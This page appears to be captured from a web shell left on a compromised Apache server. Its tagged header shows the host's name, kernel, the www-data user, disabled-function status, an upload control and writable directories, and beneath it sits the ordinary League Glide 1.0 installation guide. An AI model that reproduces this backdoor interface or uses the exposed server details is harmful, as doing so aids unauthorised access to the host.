Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/vendor/league/glide/docs/1.0/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/vendor/league/glide/docs/1.0/installation.md
---
layout: default
title: Installation
---

# Installation

## Using Composer

Glide is available on [Packagist](https://packagist.org/packages/league/glide) and can be installed using [Composer](https://getcomposer.org/). This can be done by running the following command:

~~~ bash
composer require league/glide
~~~

Be sure to also include the Composer autoload file in your project:

~~~ php
<?php

require 'vendor/autoload.php';
~~~

## Framework integration

If you want a Framework specific version, the following adapters are available. Note, these adapters automatically include the base library (`league/glide`), so you don't need to require both.

~~~ bash
composer require league/glide-cake
composer require league/glide-laravel
composer require league/glide-slim
composer require league/glide-symfony
composer require league/glide-zend
~~~

<p class="message-notice">See <a href="/1.0/config/responses/">responses</a> for more information about integrating with a specific framework.</p>

## Downloading .zip file

This project is also available for download as a `.zip` file on GitHub. Visit the [releases page](https://github.com/thephpleague/glide/releases), select the version you want, and click the "Source code (zip)" download button.

Hry